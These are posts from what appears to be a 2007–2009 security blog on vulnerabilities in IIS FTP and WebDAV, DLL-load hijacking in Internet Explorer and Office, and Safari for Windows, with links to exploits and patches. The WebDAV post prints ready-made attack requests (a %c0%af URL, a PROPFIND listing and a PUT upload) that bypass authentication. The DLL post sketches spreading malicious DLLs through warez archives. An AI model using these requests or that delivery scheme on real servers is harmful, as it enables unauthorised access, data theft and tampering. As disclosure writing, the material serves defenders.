Posted by Trancer on Aug 31 2009
 Kingcope have done it again, fully disclosing a serious 0day vulnerability in a high profile Microsoft product – A remotely exploitable stack-based buffer overflow vulnerability in Microsoft IIS FTP server.
Vulnerable versions are Microsoft IIS 5.0 (Windows 2000) and IIS 6.0 (Windows 2003) but due to stack cookie protection (/GS), on IIS 6.0 this vulnerability is unexploitable for code execution, only for denial-of-service.
The original advisory by Kingcope can be found on Full-Disclosure and the exploit can also be found on milw0rm and exploit-database #9541.
Mati Aharoni (muts) posted on the BackTrack blog a better version of the exploit. His exploit use the password value to store the payload which allows to store a larger payload – Microsoft IIS FTP 5.0 Remote SYSTEM Exploit.
Also, Xavier Mertens posted an Nmap script to scan potentially vulnerable hosts. The script check if the remote host runs Microsoft ftpd, check if anonymous login are allowed and if the MKDIR command is enabled (all the parameters needed for exploitation) – Detecting Vulnerable IIS-FTP Hosts Using Nmap.
I’ll keep this post up to date with interesting resources and further details about this vulnerability.
Updates:
>> HD Moore added a coverage for this vulnerability the Metasploit SVN tree – microsoft_ftpd_nlst.rb.
>> Kingcope also posted a Denial-of-Service (Stack Exhaustion) exploit which affects IIS 5.0, 5.1 and 6.0 FTP server on milw0rm and exploit-database #9587.
>> Thierry Zoller wrote an overview of the vulnerability on G-SEC blog – IIS 5 & IIS 6 FTP vulnerability – information and tools.
>> Microsoft issued a security advisory (975191) for this vulnerability and posted an informative post on the SRD blog – New vulnerability in IIS5 and IIS6.
>> Microsoft patched this vulnerability – MS09-053.
Categories: Vulnerabilities
        
1 Comments |  Comments RSS |  TrackBack URL
Posted by Trancer on May 21 2009
Now this is a classy, few days ago Kingcope (Nicolaos Rangos) disclosed a remote authentication bypass vulnerability in Microsoft IIS 6 WebDAV service. In the advisory Kingcope details some of this vulnerability attack vectors, such as reading files within password protected folders and directory listing password protected WebDAV folders. It is also possible to upload files to a WebDAV protected folders in some server configurations. This vulnerability is possible because WebDAV fails to properly handle Unicode character ‘/’ (%c0%af).
This reminds me of the good old Microsoft IIS 4/5 Unicode vulnerability, which was used to mass-own the Internet back in 2000-2001, what a fun vulnerability it was ^_^.
Microsoft have released a security advisory (971492) and the SRD team published two posts clearing a lot of this vulnerability details:
More information about the IIS authentication bypass.
Answers to the IIS WebDAV authentication bypass questions.
Here’s a summary of the details so far:
- Microsoft IIS 5.0 (Windows Server 2000), IIS 5.1 (Windows XP) and IIS 6.0 (Windows Server 2003) are vulnerable.
- Microsoft IIS 7.0 (Windows Server 2008) is safe.
- To exploit this vulnerability, WebDAV service must be enabled.
- WebDAV is disabled by default in IIS 6.0.
- To exploit this vulnerability, IIS server must use IIS permissions to restrict a subfolder of content to authenticated users.
- IIS server that doesn’t use IIS permissions to restrict content to authenticated users is safe.
- To exploit this vulnerability, file system access must be granted for the restricted content to the IUSR_[MachineName] account.
- IIS server that does not grant filesystem access to the IUSR_[MachineName] account is safe.
- A parent folder of the private subfolder must allow anonymous access.
- The vulnerability effects websites implementing basic, digest, or integrated windows authentication (NTLM).
- IIS server that hosts web applications using only forms-based authentication is safe.
- If the IUSR_[MachineName] account has write access to WebDAV folders, it is possible to upload content to the web server.
- Microsoft SharePoint Server is safe.
- Microsoft Outlook Web Access (OWA) Server is safe.
Exploiting the WebDAV remote authentication bypass vulnerability
Authentication bypass of password protected folders:
http://www.vulnerable.com/webdav%c0%af/sensitive.zip
Directory listing of password protected folders:
PROPFIND /web%c0%afdav/ HTTP/1.1
Host: www.vulnerable.com
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>
Writing files to password protected folders:
PUT /web%c0%afdav/foo.html HTTP/1.1
Host: www.vulnerable.com
Translate: f
Content-Length: 15
Content-Type: text/html
<h1>w00t!!</h1>
Testing tools
Further information
That’s it for now, great find by kcope indeed.
Updates:
>> Check out this blog post by Todd Manning of BreakingPoint Labs – ‘Slash’ and Burn – The IIS 6.0 WebDAV Bug – Gives interesting information about this vulnerability and IDS/IPS signature evasion techniques.
In addition, ET added an HTTP WebDAV Scanner to Metasploit – wmap_dir_webdav_unicode_bypass.rb.
From SANS ISC Diary – IIS admins, help finding WebDAV remotely using nmap.
>> From Thierry Zoller – the IIS WebDAV Unicode vulnerability also allows to bypass IP address and domain name restrictions configurations. This keeps getting better and better… :-)
>> WebDAV unicode vulnerability overview by Steve Friedl – Understanding Microsoft’s KB971492 IIS5/IIS6 WebDAV Vulnerability.
>> Microsoft patch IIS WebDAV Unicode authentication bypass vulnerability – MS09-020.
It’s about time.
Categories: Vulnerabilities
3 Comments | Comments RSS | TrackBack URL
Posted by Trancer on May 12 2009
A month ago on Black Tuesday of April 2009, Microsoft patched a handful of vulnerabilities, some of them are known for quite some time now.
In this post I’ll talk about one vulnerability in particular – the DLL-load hijacking vulnerability in Microsoft Internet Explorer 7 which was found by Aviv Raff on October 2006.
The DLL-load hijacking vulnerability allows loading specific DLL files (imageres.dll, schannel.dll and sqmapi.dll) from the desktop when running Internet Explorer. An attacker may leverage this vulnerability to execute arbitrary code in the context of the application by placing a specially crafted DLL file on a user’s desktop.
So why Microsoft did patch a security bug after two and a half years? Well, that’s a long story.
At first, Microsoft issued this vulnerability as a “bad behavior” bug and although Aviv’s warnings they didn’t relate any security considerations to this issue. Microsoft stated that if an attacker was able to create a specially crafted DLL file on a user desktop, that desktop must have already been compromised. Then on December 2006, Aviv published a PoC exploit code (exploit-database #2929) for the vulnerability on milw0rm and still, no patch from Microsoft. Even on April 2008 when Windows XP SP3 was released, Microsoft hasn’t provided a solution or a workaround of any kind for this issue.
On May 2008, Nitesh Dhanjani detailed several vulnerabilities found in Apple Safari, one of them was the “Safari Carpet Bomb” vulnerability, which enabled an attacker to force the browser to download files without the user’s consent. The default download path of Apple Safari for Windows is the user desktop.
Combining the DLL-load hijacking vulnerability and the Safari Carpet Bomb vulnerability, Aviv was able to prove a fully automated remote code execution attack. With the help of Ryan Naraine, Microsoft and Apple started taking these issues seriously after the two sent Microsoft the proof-of-concept. Microsoft released a security advisory for this “blended threat” and eventually on June 2008, Apple fixed the Safari Carpet Bomb vulnerability.
And then on April 2009, two and a half years after Aviv reported this issue, Microsoft finally patched the DLL-load hijacking vulnerability.
You can read a detailed disclosure timeline on this blog post by Aviv Raff. Further information regarding this “blended threat” can be found on CVE-2008-2540 and BID 29445.
To mitigate this issue, Microsoft released two patches:
MS09-014 – which is a cumulative security update for Internet Explorer. Regarding the DLL-load hijacking vulnerability, this patch modifies the way Internet Explorer loads files from the desktop.
MS09-015 – providing additional defense in depth protections, with this patch Microsoft introduced a new API – SetSearchPathMode which sets the per-process mode when using the SearchPath function to locate files, allows applications to force the current directory to be searched after the application and system locations.
Additional information about these patches can be found in the security bulletins and in this post on the Microsoft Security Research & Defense blog.
And now for the interesting part, what Microsoft DON’T want you to know.
As stated on the MS09-014 security bulletin, the DLL-load hijacking vulnerability affects Internet Explorer 7 and lower versions. Internet Explorer 8 users are immune to this vulnerability, Microsoft claims.
This statement is not true, Internet Explorer 8 (RTM, build 8.0.6001.18702) is, in fact, vulnerable to the DLL-load hijacking vulnerability. Not only that, this is not the only vulnerability patched in MS09-014 that affect Internet Explorer 8, but that’s a subject for another blog post.
Here’s a video demonstrating the attack on IE8 – ie8_dll_hijack.swf.
Also, Internet Explorer is not the only application vulnerable to the DLL-load hijacking vulnerability. Almost every Microsoft application I’ve tested is vulnerable and also some third party applications. For example, Microsoft Office 2007 is vulnerable.
Here’s a video demonstrating the attack on Microsoft Office Word 2007 – office_dll_hijack.swf.
As I mentioned, at first Microsoft didn’t consider this issue to be a security vulnerability due to the fact that an attacker would have to create a specially crafted DLL file on a user’s computer to exploit it. Well, I can come up with many ways to leverage this attack, for example, using P2P file sharing applications and protocols, such as BitTorrent. Attackers can distribute warez (movies, software, books and etc’) packed to a ZIP or a RAR file, add to the package a malicious DLL file and a readme .html or .doc file (or both). Once the victim downloads the malicious package and opens the readme file – GAME OVER.
So, does Microsoft lie in security bulletins to their customers? They probably are… Have a happy Black Tuesday! :-)
Update (25/08/2010):
Thanks to HD Moore, the DLL-Load Hijacking is getting a lot of media attention and tons of new exploits are published:
– Microsoft Security Advisory (2269637) – Insecure Library Loading Could Allow Remote Code Execution
– Metasploit: Exploiting DLL Hijacking Flaws
– Better, Faster, Stronger: DLLHijackAuditKit v2
– DLL-Load Hijacking\Binary Planting on Exploit-Database
– DLL Hijacking (KB 2269637) – the unofficial list
Categories: Vulnerabilities
11 Comments | Comments RSS | TrackBack URL
Posted by Trancer on Jun 12 2007
 In less then 24 hours since Apple released a Windows version of Safari web browser (v3 Beta), security researches already disclosed some high risk vulnerabilities.
This is the findings so far:
- Apple Safari for Windows Unspecified Denial of Service Vulnerability by Aviv Raff (Bugtraq ID: 24431).
- Apple Safari for Windows Memory Corruption Vulnerability by David Maynor (Bugtraq ID: 24433).
- Apple Safari for Windows URL Protocol Handler Command Injection by Thor Larholm (Bugtraq ID: 24434).
- Apple Safari for Windows Unspecified SVG Parse Engine Multiple Unspecified Vulnerabilities by Tom Ferris (Bugtraq ID: 24446).
- Apple Safari for Windows Window.setTimeout Content Spoofing Vulnerability by Robert Swiecki (Bugtraq ID: 24457 – PoC).
- Apple Safari for Windows “ROWSPAN” Denial of Service (Null Pointer) Vulnerability by Yannick von Arx (Bugtraq ID: 17674 – PoC, PoC).
- Apple Safari Password Manager Cross-Site Information Disclosure Weakness (Reverse Cross-Site Request) by David Teare (Bugtraq ID: 21329 – PoC).
- Apple Safari for Windows Content and URL Bar Spoofing Vulnerability by Robert Swiecki (Bugtraq ID: 24484 – PoC).
- Apple Safari for Windows Corefoundation.DLL Denial of Service Vulnerability by Lostmon (Bugtraq ID: 24497 – PoC).
- Apple Safari for Windows Document.Location Denial of Service Vulnerability by azizov@itdefence.ru (Bugtraq ID: 24499 – PoC).
- Apple Webkit Invalid Type Conversion Remote Code Execution Vulnerability by Rhys Kidd (Bugtraq ID: 24597).
- Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability by Richard Moore of Westpoint Ltd (Bugtraq ID: 24598).
- Apple Safari Cross-Domain Race Condition Information Disclosure Vulnerability by Lawrence Lai, Stan Switzer, Ed Rowe of Adobe Systems (Bugtraq ID: 24599).
Cool ain’t it? Here’s my 2 cents –
Apple Safari for Windows feed:// URI Denial of Service Vulnerability.
(click to enlarge)
Also on:
BID 24460
OSVDB 38864
Stay tuned for more updates.
UPDATE:
SecurityFocus – Flaw hunters go off on Safari
UPDATE 2:
14/06/2007 – Apple has released a new version of Safari for Windows – v3.0.1 Beta, check the security announcement.
There are additional vulnerabilities that has disclosed and reported to Apple, and hasn’t been fixed.
Fixed vulnerabilities:
- Bugtraq ID: 17674
- Bugtraq ID: 24431
- Bugtraq ID: 24433
- Bugtraq ID: 24434
- Bugtraq ID: 24446
- Bugtraq ID: 24457
Unfixed vulnerabilities:
- Bugtraq ID: 21329
- Bugtraq ID: 24460
- Bugtraq ID: 24484
- Bugtraq ID: 24497
- Bugtraq ID: 24499
It’s great that they respond quickly, but what’s the point in releasing a security patch without fixing all vulnerabilities?
UPDATE 3:
22/06/2007 – Apple has released a new version of Safari for Windows – v3.0.2 Beta – security announcement.
Fixed vulnerabilities:
- Bugtraq ID: 24460
- Bugtraq ID: 24484
- Bugtraq ID: 24497
- Bugtraq ID: 24499
- Bugtraq ID: 24597
- Bugtraq ID: 24598
- Bugtraq ID: 24599
Unfixed vulnerabilities:
Apple fixed the feed:// URI DoS (NULL pointer deference) vulnerability, found by us. Mentioned in the release notes.
Note that Safari 3.0.2 still vulnerable to the Reverse Cross-Site Request flaw, found by David Teare.
Categories: Vulnerabilities
7 Comments | Comments RSS | TrackBack URL
|
Here’s a vulnerability I’ve found in Microsoft Windows Live Safety Scanner (OneCare). I’m going full-disclosure with this vulnerability and I haven’t reported it to Microsoft because in my opinion, this vulnerability isn’t critical. Now let’s move on to the details.
RSS 2.0
ATOM 1.0
RDF 1.0
Links OPML
OpenSearch
